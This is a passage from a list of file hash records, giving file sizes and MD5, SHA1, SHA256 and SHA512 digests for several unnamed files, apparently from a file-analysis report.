SHA5128ddcf60c126d602be336f6c3d91a871ef9e961497b1bf279d41e77434c4b5888d1e3fe97dfb9f1d77f230b96d4523f9497ef3a28caabd683e84d639250a82a71
-
Filesize
10KB
MD5ec8bd706175852bfd746cf1928a4cff2
SHA131e49cda230a8b14a2897abe59332091fe3d71d1
SHA256e793b1ffe90ffee3e1274fa2d921d942279d7a2f80ce655c37233f8e8a3b0a42
SHA5123ef71e83804e290618090e707b7831309ee28906f4ec1de1990da862fc330af613aec9c48005cc83d68dd728edbcd911346f05b1eea02d5b984351efc6be478c
-
Filesize
10KB
MD53b4ab8673066127ba9c03ea91d5fce95
SHA17aa47cf855fff8902057ab60426e1e1f8858ad93
SHA2566be8a768b5d6a57a5aac4bdcf34ac45f53164aa4ff553fc6fd239c7fea10ff0a
SHA51253ef0602582fa2e48223ec17850bccf877b3d4e9f09f26b4a007e471bf58438f0978fdcfe82abb05c476083c3281911346e03fb80ed9dcef2e0fe1f8069469ec
-
Filesize
5.6MB
MD5b8703418e6c3d1ccd83b8d178ab9f4c9
SHA16fb0e1e0ee5bc745f52a1c29e3cf4b88a2298dd6
SHA256d6e9972976881d3dad7ac2a0c66cd7dd81420908aae8b00195a02fdf756cfc5e
SHA51275ff6e911691e3d0d32c25d4b6d275a2b6157dae418ce5507f3e3f1b321c3f0dee516b7db0fd6588860019a19862f43c5335c465829de7a418a71999b71cfc3f
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
290B
MD523af0b97e0b81ae98c92d8b48a9b072f
SHA10f6e1682315664249627b89c3d794ed17c5f9292
SHA25632944b9c7be1c8b1363d6a4b2a6e37a168ec3f447d70ad3d6d619bae58f63753
SHA512ba290a6f4a06bfeb68950c27caa0ea60f26dbd33d2cce9a66fa2fb28166329a8f39c4da27ace3e0cc735e9bfe24a45bcbacdc5ba4bce404f843f093642c2867a